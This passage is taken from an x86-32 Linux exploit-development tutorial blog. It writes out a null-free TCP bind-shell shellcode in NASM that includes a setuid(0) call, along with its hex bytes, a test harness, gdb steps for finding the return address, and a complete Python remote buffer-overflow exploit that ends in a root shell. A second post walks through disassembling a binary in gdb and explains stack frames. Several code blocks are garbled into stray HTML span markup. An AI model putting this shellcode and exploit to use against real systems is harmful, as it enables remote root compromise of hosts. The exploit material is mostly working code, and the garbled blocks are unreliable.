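    padding. addr=0 is INADDR_ANY."""
    return (struct.pack("<H", int(socket.AF_INET)) + struct.pack("!H", port)
            + struct.pack("!I", addr) + b"\x00" * 8)


def port_as_push_word(port):
    """The immediate for `push WORD` so the two bytes land in memory in
    network order: 9998 is 0x270e, its network-order bytes are 27 0e, and
    read back as a little-endian word that is 0x0e27."""
    return struct.unpack("<H", struct.pack("!H", port))[0]


def send_payload(payload, target=TARGET):
    """Deliver the payload the same way the fuzzer does (no trailing newline)."""
    with socket.create_connection(target, timeout=5) as s:
        s.sendall(payload)


if __name__ == "__main__":
    # Constructed placeholder: 40 int3 instructions stand in for the bind shell.
    placeholder_shellcode = b"\xcc" * 40
    payload = build_payload(OFFSET, 0xbffff5c0, placeholder_shellcode)
    print("payload length", len(payload), "null-free:", not has_null(payload))
    print("sockaddr_in(9998) =", sockaddr_in(9998).hex())
    print("push WORD %#06x" % port_as_push_word(9998))
    # send_payload(payload)   # only against the lab server
```

Note that the check rejects a return address like 0x08040000 for the same reason it rejects shellcode with nulls: the address travels inside the `strncpy` source too, so a stack address in the 0xbfffxxxx range is usable while anything with a zero byte is not.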
The shellcode I wrote for the first two parts had no null bytes either. Strictly, that mattered there too, since an environment variable is a null-terminated C string and would have been cut short in the same way, but here there is no way around it: the shellcode travels inside the string that `strncpy` copies, so it must not contain a single null.

The third major difference is obviously the shellcode itself. The previous shellcode just launched a shell, which would be useless here because we would have no way to talk to it, so the shellcode also has to create a network socket and either bind to a port that we then connect to (a bind shell) or connect out to a machine we control (a reverse shell).

I've chosen to write a TCP bind shell for this:

```nasm
; set up a socket listening on port 9998
; once we receive a connection duplicate
; stdin, stdout and stderr to run over that
; client socket and execute execve with
; /bin/bash

global _start

section .text

_start:
    xor eax, eax        ; zero out all the registers
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx

    mov al, 0x17        ; put 23 into eax: setuid
    xor ebx, ebx        ; zero out ebx: setuid(0) makes the real uid root too
                        ; (we are euid root thanks to the setuid bit, and bash
                        ; drops an euid that differs from the real uid)
    int 0x80            ; make the syscall setuid

    mov eax, ebx        ; zero out eax again

    mov al, 0x66        ; put the sys call number 102 (socketcall) into eax
    mov bl, 0x1         ; select SOCKET to create a new socket

    push ecx            ; push the arguments onto the stack in reverse order:
                        ; protocol 0
    push 0x1            ; SOCK_STREAM
    push 0x2            ; AF_INET
    mov ecx, esp        ; move the address of the arguments into ecx
    int 0x80            ; socketcall SOCKET: socket(AF_INET, SOCK_STREAM, 0)

    mov esi, eax        ; move the descriptor returned into esi for use later

    mov al, 0x66        ; socketcall again (eax only held the small descriptor,
                        ; so setting the low byte is enough)
    mov bl, 0x2         ; select BIND to bind to a port

    push edx            ; build struct sockaddr_in on the stack in reverse order:
                        ; sin_addr = 0 (INADDR_ANY)
    push WORD 0x0e27    ; sin_port: 9998 is 0x270e, in network byte order 27 0e,
                        ; which is 0x0e27 written as a little-endian word
    push bx             ; sin_family = AF_INET (bx is 2 at this point)
    mov ecx, esp        ; move the address of the struct sockaddr into ecx

    push 0x10           ; socklen_t argument (16)
    push ecx            ; struct sockaddr *
    push esi            ; descriptor returned by the call to socket
    mov ecx, esp        ; move the address of the arguments into ecx
    int 0x80            ; socketcall BIND: bind(fd, &addr, 16)

    mov al, 0x66        ; socketcall
    mov bl, 0x4         ; select LISTEN

    push 0x1            ; push the arguments to listen onto the stack in reverse:
                        ; backlog 1
    push esi            ; descriptor returned by the call to socket
    mov ecx, esp        ; move the address of the arguments into ecx
    int 0x80            ; socketcall LISTEN: listen(fd, 1)

    mov al, 0x66        ; socketcall
    mov bl, 0x5         ; select ACCEPT to start accepting connections

    push edx            ; push the arguments to accept onto the stack in reverse
    push edx            ; order: addrlen and addr are both NULL, we only need
    push esi            ; the descriptor here
    mov ecx, esp        ; move the address of the arguments into ecx
    int 0x80            ; socketcall ACCEPT: accept(fd, NULL, NULL)

    mov ebx, eax        ; move the descriptor returned by accept
                        ; into ebx to be the first
```
argument to/span/span span class="code-line" span class="c1"; dup2/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"ecx/spanspan class="p",/span span class="nb"ecx/span span class="c1"; zero out ecx/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"cl/spanspan class="p",/span span class="mh"0x3/span span class="c1"; get the ecx register ready to decrement/span/span span class="code-line"/span span class="code-line"span class="nl"dupfd:/span span class="c1"; the label for our loop through stdin, stdout and stderr/span/span span class="code-line"/span span class="code-line" span class="nf"dec/span span class="nb"cl/span span class="c1"; decrement ecx so we include 2, 1 and 0/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0x3f/span span class="c1"; put the sys call number 63 into eax/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall dup2/span/span span class="code-line"/span span class="code-line" span class="nf"jne/span span class="nv"dupfd/span span class="c1"; create the loop/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"eax/spanspan class="p",/span span class="nb"eax/span span class="c1"; zero out eax/span/span span class="code-line"/span span class="code-line" span class="nf"push/span span class="nb"edx/span span class="c1"; null terminate the string/span/span span class="code-line" span class="nf"push/span span class="mh"0x68736162/span span class="c1"; push the string ////bin/bash/span/span span class="code-line" span class="nf"push/span span class="mh"0x2f6e6962/span span class="c1"; in reverse/span/span span class="code-line" span class="nf"push/span span class="mh"0x2f2f2f2f/span/span span class="code-line"/span span 
class="code-line" span class="nf"mov/span span class="nb"ebx/spanspan class="p",/span span class="nb"esp/span span class="c1"; move the address of the string into ebx/span/span span class="code-line"/span span class="code-line" span class="nf"push/span span class="nb"edx/span span class="c1"; push the second argument to execve onto the/span/span span class="code-line" span class="nf"push/span span class="nb"ebx/span span class="c1"; stack in reverse order/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"ecx/spanspan class="p",/span span class="nb"esp/span span class="c1"; move the address of the 2nd argument/span/span span class="code-line" span class="c1"; into ecx/span/span span class="code-line"/span span class="code-line" span class="nf"push/span span class="nb"edx/span span class="c1"; the thrid argument to execve/span/span span class="code-line" span class="nf"mov/span span class="nb"edx/spanspan class="p",/span span class="nb"esp/span span class="c1"; a null pointer/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0xb/span span class="c1"; put the sys call number 11 into eax/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall execve/span/span span class="code-line"/code/pre/div /td/tr/table pNow to assemble, link and test the shellcode:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 
```
$ nasm -f elf32 -o bindshell.o bindshell.nasm
$ ld -o bindshell bindshell.o
$ objdump -d ./bindshell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80"
$ cat shellcode.c
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80";

main()
{

 printf("Shellcode Length: %d\n", strlen(code));

 int (*ret)() = (int(*)())code;

 ret();

}
$ gcc -z execstack -fno-stack-protector -o shellcode shellcode.c
$ ./shellcode
Shellcode Length: 119
```

```
$ nc 127.0.0.1 9998
whoami
testuser
```

So our shellcode works. Lastly we need to figure out where our shellcode will land. One thing you need to know is that when you start an application under `gdb`, the layout of the stack is slightly different from when it is started on its own (we saw this in part 2, where we kept having to adjust our attack inside and outside of `gdb`).

Our shellcode is going to be stored on the stack, so we need to start the application outside of `gdb` and attach to it from another root terminal to get the right position that our shellcode will be at:

```
$ ./app-net
```

```
# ps ax | grep app-net
19269 pts/0    S+     0:00 ./app-net
22791 pts/1    S+     0:00 grep app-net
# gdb -q -p 19269
Attaching to process 19269
Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done.
Reading symbols from /lib/i386-linux-gnu/i686/cmov/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb7fe1424 in __kernel_vsyscall ()
(gdb) c
Continuing.
```

```
$ python -c 'print "A"*532' | nc 127.0.0.1 9999
```

```
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/20xw $esp
0xbffff390: 0xbfff000a 0xbffff3b4 0x000003e8 0x00000000
0xbffff3a0: 0xbffff7a0 0xbffff79c 0x000057a8 0x00000006
0xbffff3b0: 0x00001000 0x41414141 0x41414141 0x41414141
0xbffff3c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff3d0: 0x41414141 0x41414141 0x41414141 0x41414141
```

So our shellcode will start at `0xbffff3b4` (it is the second column of the row starting `0xbffff3b0`; each column is 4 bytes long, so `0xbffff3b0` + 4 = `0xbffff3b4`). This is the address that we need to overwrite EIP with.

Now that we have the length of our shellcode (119), the address at which we start overwriting the stack and the number of bytes until we overwrite EIP, we can write our exploit:

```python
#!/usr/bin/env python

import socket

shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80"

payload = "\x90" * 402         # (528 - 119) - 7 = 402

payload += shellcode           # append our shellcode

payload += "\x90" * 7          # another 7 bytes

payload += "\xb4\xf3\xff\xbf"  # the address of our shellcode
                               # in reverse (little endian)

# create the tcp socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to 127.0.0.1 port 9999
s.connect(("127.0.0.1", 9999))

# send our payload
s.send(payload)

# close the socket
s.close()
```

## Exploiting The App

Finally we can test the exploit against our application:

```
$ ./app-net
```

```
$ python app-net-exploit.py
$ nc 127.0.0.1 9998
ls
app-net
secret.txt
whoami
root
cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!
```

PWNED!!! :-D

## Conclusion

I hope this has highlighted the differences between attacking local and remote applications. Different situations will always arise where you need to tweak the method you use to attack the application, so it is best to be able to adapt to as many situations as possible.

It is a little more difficult to develop exploits for remote applications, and they might not work when run against the actual target because of differences between the development environment and the target environment, which is why it is very important to replicate the target environment as closely as possible.

Happy Hacking :–)

Basic Binary Auditing

1 July 2014 at 10:32
By: 0xe7
Before I go into some of the protections that are commonly in place, I thought it would be best to show how to detect these 2 basic vulnerabilities using [reverse engineering](https://en.wikipedia.org/wiki/Reverse_engineering) (as opposed to randomly [fuzzing](https://en.wikipedia.org/wiki/Fuzz_testing) inputs, as we did in parts [1](/x86-32-linux/2014/05/08/plain-buffer-overflow/), [2](/x86-32-linux/2014/05/20/plain-format-string-vulnerability/) and [3](/x86-32-linux/2014/06/12/remote-exploitation/)).

Reverse engineering (reversing) is an extremely powerful tool in the hacker's arsenal, and when there is no source code for the application you are targeting, nothing is better.

[Assembly](https://en.wikipedia.org/wiki/Assembly_language) is the language of reversing and a [debugger](https://en.wikipedia.org/wiki/Debugger) is the most important tool.

Assembly is essentially the language of the processor: the actual "machine code" that people think of the computer dealing with (whether viewed as binary or hex) is just a different representation of assembly language, so this is the lowest-level programming language available to anyone outside of processor firmware development.

A debugger is an application that allows you to view an application's [virtual memory segment](https://en.wikipedia.org/wiki/Virtual_memory) as the application itself sees it, as well as change the values in sections of memory or in [CPU registers](https://en.wikipedia.org/wiki/Processor_register) at run time.

Another important feature of a debugger is the ability to set [breakpoints](https://en.wikipedia.org/wiki/Breakpoint), so you can force the application to stop execution at a specific point and view values, or [step through](https://en.wikipedia.org/wiki/Stepping_%28debugging%29) the application instruction by instruction.

## The App

We will use the same basic application we used in parts [1](/x86-32-linux/2014/05/08/plain-buffer-overflow/) and [2](/x86-32-linux/2014/05/20/plain-format-string-vulnerability/):
```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PASS "topsecretpassword"

#define SFILE "secret.txt"

int checkpass(char *p);
void printfile();

int main(int argc, char **argv)
{
    int r;

    if (argc < 2) {
        printf("Usage: ");
        printf(argv[0]);
        printf(" <password>\n");
        exit(1);
    }
    r = checkpass(argv[1]);
    if (r != 0) {
        printf("Wrong password: ");
        printf(argv[1]);
        printf("\n");
        exit(1);
    }
    printfile();
}

int checkpass(char *a)
{
    char p[512];
    int r;
    strncpy(p, a, strlen(a)+1);
    r = strcmp(p, PASS);
    return r;
}

void printfile()
{
    FILE *f;
    int c;
    f =
```
class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis time we will not 
exploit this application (we've done that already), instead we'll just use the debugger it figure out that these vulnerabilities exist./p h2Setting Up The Environment/h2 pThis is the same as in part a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a and a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a so please refer to the strongSetting Up The Environment/strong section of 1 of those./p h2Looking For The Juicy Bits/h2 pFirst we'll test the application as usual:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="nb"test/span/span span class="code-line"span class="go"Wrong password: test/span/span span class="code-line"span class="gp"[email protected]:~$ echo $/span?/span span class="code-line"span class="go"1/span/span span class="code-line"/code/pre/div /td/tr/table pNothing unusual there but we now know that the application takes 1 argument. 
<p>If we open this using <code>gdb</code> we can have a closer look at it:</p>
<pre><code> 1  $ gdb -q ./app
 2  Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
 3  (gdb) set disassembly-flavor intel
 4  (gdb) info functions
 5  All defined functions:
 6  
 7  Non-debugging symbols:
 8  0x0804842e  _init
 9  0x08048460  strcmp
10  0x08048460  strcmp@plt
11  0x08048470  printf
12  0x08048470  printf@plt
13  0x08048480  fclose
14  0x08048480  fclose@plt
15  0x08048490  _IO_getc
16  0x08048490  _IO_getc@plt
17  0x080484a0  puts
18  0x080484a0  puts@plt
19  0x080484b0  __gmon_start__
20  0x080484b0  __gmon_start__@plt
21  0x080484c0  exit
22  0x080484c0  exit@plt
23  0x080484d0  strlen
24  0x080484d0  strlen@plt
25  0x080484e0  __libc_start_main
26  0x080484e0  __libc_start_main@plt
27  0x080484f0  fopen
28  0x080484f0  fopen@plt
29  0x08048500  putchar
30  0x08048500  putchar@plt
31  0x08048510  strncpy
32  0x08048510  strncpy@plt
33  0x08048520  _start
34  0x08048550  deregister_tm_clones
35  0x08048580  register_tm_clones
36  0x080485c0  __do_global_dtors_aux
37  0x080485e0  frame_dummy
38  0x0804860c  main
39  0x080486a2  checkpass
40  0x080486f0  printfile
41  0x08048760  __libc_csu_fini
42  0x08048770  __libc_csu_init
43  0x080487ca  __i686.get_pc_thunk.bx
44  0x080487d0  _fini
</code></pre>
<p>Here we can tell that the application was written in <a href="https://en.wikipedia.org/wiki/C_%28programming_language%29" target="_blank">C</a> because it includes <code>__libc_start_main</code> on lines 25 and 26. This means we have a <code>main</code> function which is the start of our application (shown on line 38).</p>
<p>There are a couple of other functions of interest here, but let's leave them for a bit and look at the <code>main</code> function:</p>
<pre><code> 1  (gdb) disassemble main
 2  Dump of assembler code for function main:
 3     0x0804860c &lt;+0&gt;:     push   ebp
 4     0x0804860d &lt;+1&gt;:     mov    ebp,esp
 5     0x0804860f &lt;+3&gt;:     and    esp,0xfffffff0
 6     0x08048612 &lt;+6&gt;:     sub    esp,0x20
 7     0x08048615 &lt;+9&gt;:     cmp    DWORD PTR [ebp+0x8],0x1
 8     0x08048619 &lt;+13&gt;:    jg     0x804864c &lt;main+64&gt;
 9     0x0804861b &lt;+15&gt;:    mov    DWORD PTR [esp],0x80487f0
10     0x08048622 &lt;+22&gt;:    call   0x8048470 &lt;printf@plt&gt;
11     0x08048627 &lt;+27&gt;:    mov    eax,DWORD PTR [ebp+0xc]
12     0x0804862a &lt;+30&gt;:    mov    eax,DWORD PTR [eax]
13     0x0804862c &lt;+32&gt;:    mov    DWORD PTR [esp],eax
14     0x0804862f &lt;+35&gt;:    call   0x8048470 &lt;printf@plt&gt;
15     0x08048634 &lt;+40&gt;:    mov    DWORD PTR [esp],0x80487f8
16     0x0804863b &lt;+47&gt;:    call   0x80484a0 &lt;puts@plt&gt;
17     0x08048640 &lt;+52&gt;:    mov    DWORD PTR [esp],0x1
18     0x08048647 &lt;+59&gt;:    call   0x80484c0 &lt;exit@plt&gt;
19     0x0804864c &lt;+64&gt;:    mov    eax,DWORD PTR [ebp+0xc]
20     0x0804864f &lt;+67&gt;:    add    eax,0x4
21     0x08048652 &lt;+70&gt;:    mov    eax,DWORD PTR [eax]
22     0x08048654 &lt;+72&gt;:    mov    DWORD PTR [esp],eax
23     0x08048657 &lt;+75&gt;:    call   0x80486a2 &lt;checkpass&gt;
24     0x0804865c &lt;+80&gt;:    mov    DWORD PTR [esp+0x1c],eax
25     0x08048660 &lt;+84&gt;:    cmp    DWORD PTR [esp+0x1c],0x0
26     0x08048665 &lt;+89&gt;:    je     0x804869b &lt;main+143&gt;
27     0x08048667 &lt;+91&gt;:    mov    DWORD PTR [esp],0x8048804
28     0x0804866e &lt;+98&gt;:    call   0x8048470 &lt;printf@plt&gt;
29     0x08048673 &lt;+103&gt;:   mov    eax,DWORD PTR [ebp+0xc]
30     0x08048676 &lt;+106&gt;:   add    eax,0x4
31     0x08048679 &lt;+109&gt;:   mov    eax,DWORD PTR [eax]
32     0x0804867b &lt;+111&gt;:   mov    DWORD PTR [esp],eax
33     0x0804867e &lt;+114&gt;:   call   0x8048470 &lt;printf@plt&gt;
34     0x08048683 &lt;+119&gt;:   mov    DWORD PTR [esp],0xa
35     0x0804868a &lt;+126&gt;:   call   0x8048500 &lt;putchar@plt&gt;
36     0x0804868f &lt;+131&gt;:   mov    DWORD PTR [esp],0x1
37     0x08048696 &lt;+138&gt;:   call   0x80484c0 &lt;exit@plt&gt;
38     0x0804869b &lt;+143&gt;:   call   0x80486f0 &lt;printfile&gt;
39     0x080486a0 &lt;+148&gt;:   leave
40     0x080486a1 &lt;+149&gt;:   ret
41  End of assembler dump.
</code></pre>
<p>The first 4 instructions are the <a href="https://en.wikipedia.org/wiki/Function_prologue" target="_blank">function prologue</a> (lines 3, 4, 5 and 6). Here the <a href="http://en.citizendium.org/wiki/Stack_frame" target="_blank">stack frame</a> is set up.</p>
<p>The last 2 instructions are the <a href="https://en.wikipedia.org/wiki/Function_prologue#Epilogue" target="_blank">function epilogue</a> (lines 39 and 40). Here the <code>leave</code> instruction performs the inverse of what the prologue did.</p>
<p>Looking at the prologue and epilogue we can see that the <a href="https://en.wikipedia.org/wiki/Calling_convention" target="_blank">calling convention</a> is probably <a href="https://en.wikipedia.org/wiki/X86_calling_conventions#cdecl" target="_blank">cdecl</a>.</p>
<p>I will not go into calling conventions much here, because it isn't terribly relevant, although it's important to know what they are and the differences between them; a calling convention basically defines how a function is called.</p>
<p>Back on topic: initially, when looking for a vulnerability we should check some of the known vulnerable functions commonly used by developers. The main ones are the <code>printf</code> family of functions and the string copying/moving functions.</p>
<p>Looking back at our list of functions, a couple of interest are being used, mainly <code>printf</code> and <code>strncpy</code>. In the main function, though, only <code>printf</code> out of those 2 is being used. Let's examine them a little closer.</p>
<p>The first, on line 10, is set up on line 9 with an argument:</p>
<pre><code>   0x0804861b &lt;+15&gt;:    mov    DWORD PTR [esp],0x80487f0
   0x08048622 &lt;+22&gt;:    call   0x8048470 &lt;printf@plt&gt;
</code></pre>
<p>What the first instruction is doing here is moving the address <code>0x80487f0</code> into the address <strong>pointed to</strong> by the <a href="http://www.c-jump.com/CIS77/ASM/Stack/S77_0040_esp_register.htm" target="_blank">ESP register</a>. These 2 lines relate to line 17 in our source code above.</p>
<p>The ESP register points to the top of the <a href="https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29" target="_blank">stack</a> and in the cdecl calling convention, before the actual call to the function, its arguments are <strong>pushed</strong> onto the stack in reverse order. As there is only 1 argument to this call, only 1 is put on the stack.</p>
<p>To be honest, this call doesn't look like it's going to be of interest, as the argument is a static address and it points to the <a href="https://en.wikipedia.org/wiki/Code_segment" target="_blank">text segment</a> of memory which isn't writable, but we can check the value of this just to make sure:</p>
<pre><code>(gdb) x/s 0x80487f0
0x80487f0:  "Usage: "
</code></pre>
<p>So it looks to be part of an error message. The next call to <code>printf</code> looks more interesting, but first we need to understand how a stack frame is arranged in an application like this.</p>
<h2>Stack Frames</h2>
<p>Below is the top of an example stack frame which is getting ready for a function call:</p>
<p><img src="/assets/images/x86-32-linux/stack1.jpg" width="300"></p>
<p>Here we are unable to see the base pointer (EBP), but we can see the stack pointer (ESP), which always points to the top of the stack.</p>
<p>Putting arguments on the stack can be done in a number of ways. Firstly, it can be done using the <code>push</code> instruction as follows:</p>
<pre><code>push eax
push 0x80487f0
push [ebp+c]
</code></pre>
<p>Here the value in the EAX register is being <strong>pushed</strong> onto the stack as the third argument (or "ARG 3" in our diagram), then the static value <code>0x80487f0</code> as the second argument and finally EBP+c (or EBP+12, which is usually the second argument to the current function) as the first argument.</p>
<p>The <code>push</code> instruction automatically adjusts the value of ESP accordingly, but it can also be done manually:</p>
<pre><code>sub esp, 0xc
mov [esp+8], eax
mov [esp+4], 0x80487f0
mov [esp], [ebp+c]
</code></pre>
<p>This set of instructions is functionally the same as the previous one. These are followed by a <code>call</code> instruction, and after the call instruction our stack looks like this:</p>
<p><img src="/assets/images/x86-32-linux/stack2.jpg" width="300"></p>
<p>The <code>call</code> instruction automatically <strong>pushes</strong> the memory address of the next instruction onto the stack. This is done so that when a function returns the application knows where to start executing instructions.</p>
<p>Inside the function that we have just called we start executing that function's prologue. First there is a <code>push ebp</code> instruction which does this to the stack:</p>
<p><img src="/assets/images/x86-32-linux/stack3.jpg" width="300"></p>
<p>After that it executes <code>mov ebp, esp</code>:</p>
<p><img src="/assets/images/x86-32-linux/stack4.jpg" width="300"></p>
<p>Lastly, any space needed for local variables is subtracted from ESP (<code>sub esp, 0x8</code>), so our stack ends up like this:</p>
<p><img src="/assets/images/x86-32-linux/stack5.jpg" width="300"></p>
<p>EBP always points to the start of the current function's stack frame and ESP to the top of the stack, so if we call another function inside the current function the same process would happen.</p>
<p>The function's epilogue does the opposite; in the application we are debugging it is just the <code>leave</code> instruction. The <code>leave</code> instruction automates the cleanup of the stack frame.</p>
<p>In our example stack, the <code>leave</code> instruction would be equivalent to:</p>
<pre><code>add esp, 0x8
pop ebp
</code></pre>
<p>This would bring our stack frame back to this:</p>
<p><img src="/assets/images/x86-32-linux/stack2.jpg" width="300"></p>
<p>And then the final <code>ret</code> instruction would remove the <strong>RET ADDR</strong> from the stack, setting everything back to how it was before the function call; <code>ret</code> essentially does <code>pop eip</code>.</p>
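<p>The push, call, prologue, leave and ret steps just described, as an added example that is not code from the article: a small C model of a 32-bit cdecl stack that executes that exact sequence and then reads back where the argument, the return address and the saved EBP sit relative to EBP. The addresses 0x80486a2 (<code>checkpass</code>) and 0x0804865c (the instruction after the call in <code>main</code>) are taken from the disassembly above; the modelled stack region, the 8 bytes of locals and the argument value 0x80487f0 are assumptions made for the demonstration, and the function and type names are ours.</p>

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the article: a word-addressed model of the
 * 32-bit cdecl stack the diagrams above describe.  STACK_BASE is an assumed
 * address; the code addresses below come from the disassembly of main. */

#define STACK_WORDS 256
#define STACK_BASE  0xbfffe000u                  /* assumed: lowest modelled address */
#define STACK_TOP   (STACK_BASE + 4u * STACK_WORDS)

typedef struct {
    uint32_t mem[STACK_WORDS];   /* mem[i] is the dword at STACK_BASE + 4*i */
    uint32_t esp, ebp, eip;
} Cpu;

/* Every access must stay inside the modelled region and be 4-byte aligned. */
static uint32_t *slot(Cpu *c, uint32_t addr)
{
    if (addr < STACK_BASE || addr >= STACK_TOP || (addr & 3u))
        return NULL;
    return &c->mem[(addr - STACK_BASE) / 4u];
}

uint32_t rd(Cpu *c, uint32_t addr) { uint32_t *p = slot(c, addr); return p ? *p : 0u; }
void     wr(Cpu *c, uint32_t addr, uint32_t v) { uint32_t *p = slot(c, addr); if (p) *p = v; }

void cpu_init(Cpu *c)
{
    memset(c, 0, sizeof *c);
    c->esp = STACK_TOP - 16u;   /* caller's stack pointer, with a little headroom */
    c->ebp = STACK_TOP - 8u;    /* caller's frame base; only its value matters here */
    c->eip = 0u;
}

/* push: decrement ESP, then store.  pop: load, then increment ESP. */
void     push(Cpu *c, uint32_t v) { c->esp -= 4u; wr(c, c->esp, v); }
uint32_t pop(Cpu *c)              { uint32_t v = rd(c, c->esp); c->esp += 4u; return v; }

/* call: push the address of the next instruction, then jump. */
void call(Cpu *c, uint32_t target, uint32_t next_ip) { push(c, next_ip); c->eip = target; }

/* Prologue as the article describes it: push ebp; mov ebp,esp; sub esp,locals. */
void prologue(Cpu *c, uint32_t locals) { push(c, c->ebp); c->ebp = c->esp; c->esp -= locals; }

/* leave: mov esp,ebp; pop ebp  (the same as add esp,locals; pop ebp). */
void leave(Cpu *c) { c->esp = c->ebp; c->ebp = pop(c); }

/* ret: pop eip. */
void ret(Cpu *c) { c->eip = pop(c); }

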